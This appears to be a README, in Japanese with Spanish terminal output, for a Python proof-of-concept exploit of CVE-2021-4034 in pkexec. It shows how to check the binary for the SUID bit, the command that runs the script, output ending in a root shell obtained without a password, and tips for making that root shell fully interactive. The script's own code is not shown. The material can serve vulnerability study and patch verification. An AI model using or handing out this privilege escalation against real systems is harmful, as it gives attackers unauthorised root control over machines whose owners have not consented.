
CVE-2021-4034のPython概念実証エクスプロイト。SUID pkexecバイナリを悪用して権限を昇格させ、資格情報なしで対話型ルートシェルを起動します。
CVE-2021-4034 (pkexec) このPythonスクリプトは、pkexecファイルの脆弱性を悪用して、パスワードを入力せずにrootアクセスを取得します。
· バイナリがSUID権限を持っているかどうかを検出します。この場合、脆弱性があります。
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
· エクスプロイトを実行してrootアクセスを取得します。この場合、python3で実行するだけで完了後、rootとしてコンソールが開きます。
usuario@gatogamer $ python3 CVE-2021-4034.py
[+] Iniciando el exploit
[+] Exploit Completado
# whoami
root
#
· 補足として、TERMの値を'xterm'または'xterm-256color'に変更して見た目を良くしたり、'bash'や'zsh'などの別のシェルを実行して完全に対話型のコンソールにすることもできます。
# export TERM=xterm-256color
# zsh
root@gatogamer $